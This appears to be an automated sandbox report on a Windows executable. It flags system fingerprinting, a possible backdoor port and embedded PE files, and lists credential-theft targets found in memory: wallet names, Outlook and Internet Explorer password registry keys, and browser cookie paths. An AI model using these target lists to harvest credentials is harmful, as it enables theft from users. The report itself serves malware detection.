Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeW,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	0_1_00436ED1
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	0_1_00444EAA
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,__invoke_watson,	0_1_00438F7A
Source: C:\Users\user\Desktop\rb5iJg6pgN.exe	Code function: _memset,_TranslateName,_TranslateName,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,	0_1_00446F0E

Contains functionality to query CPU information (cpuid)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Code function: 0_2_00401260 cpuid

0_2_00401260

Queries device information via Setup API

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

0_2_00401453

Queries the installation date of Windows

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Queries the product ID of Windows

Show sources

Source: C:\Windows\explorer.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID			Jump to behavior
Source: C:\Windows\explorer.exe	Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID			Jump to behavior

Queries the volume information (name, serial number etc) of a device

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Queries volume information: unknown VolumeInformation

Jump to behavior

Contains functionality to create pipes for IPC

Show sources

Source: C:\Windows\explorer.exe

Code function: 2_2_015527A1 CreateNamedPipeA,CreateThread,GetLastError,CloseHandle,GetLastError,

2_2_015527A1

Contains functionality to query local / system time

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Code function: 0_1_00434B6E GetSystemTimeAsFileTime,__aulldiv,

0_1_00434B6E

Contains functionality to query windows version

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Code function: 0_2_00402055 GetModuleHandleA,GetModuleHandleA,GetVersion,GetCurrentProcessId,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CloseHandle,

0_2_00402055

Queries the cryptographic machine GUID

Show sources

Source: C:\Windows\System32\systeminfo.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

May initialize a security null descriptor

Show sources

Source: explorer.exe, 00000002.00000002.1544224987.01596000.00000004.sdmp

Binary or memory string: S:(ML;;NRNWNX;;;LW)

Stealing of Sensitive Information:

Detected list of crypto currency wallet names in memory (likely to steal)

Show sources

Source: explorer.exe	String found in binary or memory: electrum-
Source: explorer.exe	String found in binary or memory: armory-
Source: explorer.exe	String found in binary or memory: msigna.
Source: explorer.exe	String found in binary or memory: multibit-hd
Source: explorer.exe	String found in binary or memory: JEdudus.
Source: explorer.exe	String found in binary or memory: bither
Source: explorer.exe	String found in binary or memory: Jaxx.
Source: explorer.exe	String found in binary or memory: bitcoin

May steal data from Internet Explorer (IESTEALER detected)

Show sources

Source: explorer.exe	String found in binary or memory: #IESTEALER#
Source: explorer.exe	String found in binary or memory: #IESTEALER#
Source: explorer.exe, 00000002.00000002.1544201745.0156E000.00000002.sdmp	String found in binary or memory: Username: Software\Microsoft\Internet Explorer\TypedURLsSoftware\Microsoft\Internet Explorer\IntelliForms\Storage2#IESTEALER#

May steal data from Outlook (OLSTEALER detected)

Show sources

Source: explorer.exe	String found in binary or memory: #OLSTEALER#
Source: explorer.exe	String found in binary or memory: #OLSTEALER#
Source: explorer.exe, 00000002.00000002.1544201745.0156E000.00000002.sdmp	String found in binary or memory: %02X?%uSMTP PasswordHTTP PasswordNNTP PasswordIMAP PasswordPOP3 PasswordSMTP Password2HTTPMail Password2NNTP Password2IMAP Password2POP3 Password2IMAP PortSMTP PortPOP3 PortSMTP UserHTTPMail ServerHTTPMail User NameIMAP UserPOP3 UserHTTP Server URLHTTP UserEmailIMAP User NameIMAP ServerNNTP ServerNNTP User NameNNTP Email AddressSMTP User NamePOP3 User NamePOP3 ServerSMTP ServerSMTP Email Address#OLSTEALER#

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\2FC00D105DDC9C4B11E5D8DDE4091512B1EEA3C7	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\240DBA190FBDB5C15D3DC194B329223B5B19D549	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\A587D4F5472B1A6BBBBA4A37D224FA8619926015	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\2918063365piupsah.files	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.files	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\929BCF811537CE5A1B05BC367E7D5FCD9D1512C2	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\D969E6FE602AA63FF192D0E10C841D12C8630308	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\098A3394207ED67B189FE76C2DC12503C3C08949	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\D85795856A15100A0C45C075CFB29C4FC314C2EE	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\FD24152333840F176EE70AE0628F9364B85BB1F7	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\doomed	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\01974EBFBB850697430A4F12734195ED05077738	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\38DF22172C17E32AA1584C6DD44E81038E19EFB5	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\F045CCBF583BD17042216E343183D80AC87C5FB9	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\BC9BC80654AEBC9F7505DD601A9A1B4BDBC0C7F3	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\CE40DF72E47995F12B7A0C9DB884C82D865203F5	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\EF266C446B089CF06B1E028D371C054ABCDEBA8D	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\834E996870C3095DCCB32D197E6FF17DDECDD31E	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\cookies.sqlite	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\22qkc0w7.default\storage\permanent\moz-safe-about+home\idb\818200132aebmoouht.sqlite	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\228A34E27343511229AA075674752A42E75408BD	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\E325B486B777C14C29762600D998974140F8FD34	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\EA4732DBF7EE1F2B169923CD35582C482705391E	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\F1B5C3EDE100D4A38A0A28F1CEF6FAEFB619EC1B	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\6DF8F54B434FDF7BB9EBD7E5B1D7FB4081D310C6	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\EE3B023192255EF0F8BF72624FD26BCBEA167009	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\D884B3C0D6FDA5EAB04FCB8FC7E00A32EAD9147D	Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\22qkc0w7.default\cache2\entries\4BCFB577C7B1B9001B922FFD2473F2B7AF1B75BE	Jump to behavior

Tries to steal Mail credentials (via file access)

Show sources

Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior
Source: C:\Windows\explorer.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Jump to behavior

Searches for user specific document files

Show sources

Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Windows\explorer.exe	Directory queried: C:\Users\user\Documents\EFOYFBOLXA	Jump to behavior

Remote Access Functionality:

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Show sources

Source: C:\Users\user\Desktop\rb5iJg6pgN.exe

Code function: 0_1_00407FF4 __EH_prolog,GetDialogBaseUnits,GetDialogBaseUnits,GetDialogBaseUnits,BeginDeferWindowPos,DeferWindowPos,DeferWindowPos,DeferWindowPos,DeferWindowPos,EndDeferWindowPos,DefWindowProcA,GetMenu,GetMenu,GetMenu,GetSubMenu,GetSubMenu,GetSubMenu,GetMenu,GetSubMenu,GetMenu,GetSubMenu,GetMenu,GetSubMenu,SendMessageA,SendMessageA,SendMessageA,CheckMenuItem,CheckMenuItem,CheckMenuItem,CheckMenuItem,CheckMenuItem,CheckMenuItem,EnableMenuItem,EnableMenuItem,SendMessageA,EnableMenuItem,SendMessageA,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,EnableMenuItem,GetLastError,CreateBindCtx,CreateRectRgn,CombineRgn,CertDuplicateStore,GlobalAlloc,DialogBoxIndirectParamA,

0_1_00407FF4

Behavior Graph

Simulations

Behavior and APIs

Time	Type	Description
14:38:30	API Interceptor	18275x Sleep call for process: rb5iJg6pgN.exe modified
14:38:46	API Interceptor	3375x Sleep call for process: explorer.exe modified
14:39:45	API Interceptor	12x Sleep call for process: systeminfo.exe modified
14:40:05	API Interceptor	3x Sleep call for process: tasklist.exe modified
14:40:08	API Interceptor	3x Sleep call for process: driverquery.exe modified

Antivirus and Machine Learning Detection

Initial Sample

Source	Detection	Scanner	Label	Link
rb5iJg6pgN.exe	100%	Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Download
0.0.rb5iJg6pgN.exe.400000.0.unpack	100%	Joe Sandbox ML	Download File
0.1.rb5iJg6pgN.exe.400000.0.unpack	100%	Joe Sandbox ML	Download File
0.2.rb5iJg6pgN.exe.400000.1.unpack	100%	Joe Sandbox ML	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

Source	Rule	Description	Author	Strings
rb5iJg6pgN.exe	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0x3507f:$mz: 4D 5A 0x3af37:$mz: 4D 5A 0x714ea:$mz: 4D 5A 0x7c1b0:$mz: 4D 5A 0xa1959:$mz: 4D 5A 0xa6c87:$mz: 4D 5A 0xaef58:$mz: 4D 5A 0xb47cc:$mz: 4D 5A 0xbcc42:$mz: 4D 5A 0xbf097:$mz: 4D 5A 0xcd2e5:$mz: 4D 5A 0xd1f91:$mz: 4D 5A

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000000.1467280177.00400000.00000002.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000000.00000001.1467651208.00400000.00000002.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000000.00000002.1499833844.002D0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000000.00000002.1499976703.00400000.00000002.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000000.00000003.1486070629.01620000.00000004.sdmp	Embedded_PE	unknown	unknown	0x20:$mz: 4D 5A 0x399e:$mz: 4D 5A 0xd573:$mz: 4D 5A 0xdbdc:$mz: 4D 5A 0x10aa9:$mz: 4D 5A 0x192e8:$mz: 4D 5A 0x1b9ad:$mz: 4D 5A 0x27e1d:$mz: 4D 5A 0x2d879:$mz: 4D 5A 0x38edc:$mz: 4D 5A 0x39262:$mz: 4D 5A 0x41409:$mz: 4D 5A 0x4b53e:$mz: 4D 5A
00000002.00000002.1543921572.00060000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000002.00000002.1544091557.00650000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000002.00000002.1544074903.00630000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1499473775.00060000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1499698657.00440000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1501425872.016F0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1502801306.01D30000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1502827811.01D70000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1502842638.01DA0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1502889959.01E00000.00000002.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1502878957.01DF0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1502536161.01A20000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1503029285.02020000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1507679611.02BA0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1507689530.02BC0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1507943848.02D40000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1507950533.02D70000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1507991377.02DE0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1508015150.02E20000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1508035531.02E60000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1508020629.02E30000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1508119677.03020000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1508132762.03080000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1508179226.03130000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1508183860.03140000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1508802180.035F0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1508810634.03600000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1508897767.03AF0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1509255440.03C20000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1510641728.03D80000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1510698102.03E20000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1510826926.03EE0000.00000002.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1510791092.03EB0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1510705859.03E40000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1510762006.03E90000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1510778872.03EA0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1510661452.03DE0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1510834757.03EF0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1510878677.03F70000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1509201484.03B70000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1509319448.03C30000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1510996422.04150000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1511065722.042C0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1516367336.070E0000.00000002.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0x62f67:$mz: 4D 5A 0xc7b9f:$mz: 4D 5A 0xc8cc4:$mz: 4D 5A 0xfa22c:$mz: 4D 5A 0xfab23:$mz: 4D 5A 0xfb5e6:$mz: 4D 5A 0xfbcde:$mz: 4D 5A 0x11c4ef:$mz: 4D 5A 0x126750:$mz: 4D 5A 0x12eb59:$mz: 4D 5A 0x1305fb:$mz: 4D 5A 0x130a9c:$mz: 4D 5A 0x133cb4:$mz: 4D 5A 0x14d7f7:$mz: 4D 5A 0x1523e2:$mz: 4D 5A 0x15513b:$mz: 4D 5A 0x159cc0:$mz: 4D 5A 0x16837f:$mz: 4D 5A 0x242953:$mz: 4D 5A 0x26cf5a:$mz: 4D 5A
00000003.00000000.1509998222.03CC0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1526476296.016F0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1528350249.01D70000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1528282321.01D30000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1529056137.01E00000.00000002.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1528914237.01DF0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1529414366.02020000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1534115502.02BA0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1534129692.02BC0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1534313551.02D40000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1534334049.02D70000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1528641544.01DA0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1534425716.02E20000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1534481919.02E60000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1534585823.03020000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1534437822.02E30000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1534605501.03080000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1534672142.03130000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1534679802.03140000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1524597638.00440000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1524475486.00060000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
00000003.00000000.1514376422.05310000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A 0x601df:$mz: 4D 5A
00000003.00000000.1535904797.03AF0000.00000008.sdmp	Embedded_PE	unknown	unknown	0x0:$mz: 4D 5A
